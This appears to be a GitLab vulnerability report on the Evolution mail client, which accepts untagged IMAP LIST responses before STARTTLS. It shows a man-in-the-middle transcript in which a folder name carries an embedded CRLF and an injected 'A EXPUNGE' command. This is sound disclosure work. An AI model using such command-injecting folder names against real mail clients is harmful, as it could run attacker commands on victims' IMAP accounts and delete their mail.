GitLab

Evolution accepts untagged LIST responses before STARTTLS. This allows an attacker to create folders with any name (and possibly malicious inputs) in Evolution. I am not sure if this is already kind of a misbehavior even without STARTTLS, because the IMAP RFC does not really prohibit that.

I believe this could also be escalated to a more severe issue. E.g. when an attacker injects a folder name with "\r\nTAG COMMAND", it could trick Evolution to execute attacker-controlled commands on the IMAP server after login.

This is what the MitM attacker would send...

S: * OK [CAPABILITY IMAP4REV1 STARTTLS LOGINDISABLED] IMAP server ready.\r\n
S: * LIST () "/" {25}\r\n
"Click me...\r\n
A EXPUNGE\r\n
\r\n
C: B00010 STARTTLS\r\n
S: B00010 OK begin TLS now.\r\n
<----- Switching to TLS now ----->

After user clicks on the folder...

C: C00028 STATUS "\\"Click me...&AA0ACg-A EXPUNGE&AA0ACg-" (MESSAGES UNSEEN UIDVALIDITY UIDNEXT)\r\n
S: * STATUS "\\"Click me...&AA0ACg-A EXPUNGE&AA0ACg-" (MESSAGES 0 UNSEEN 0 UIDVALIDITY 123456 UIDNEXT 1)\r\n
S: C00028 OK status done.\r\n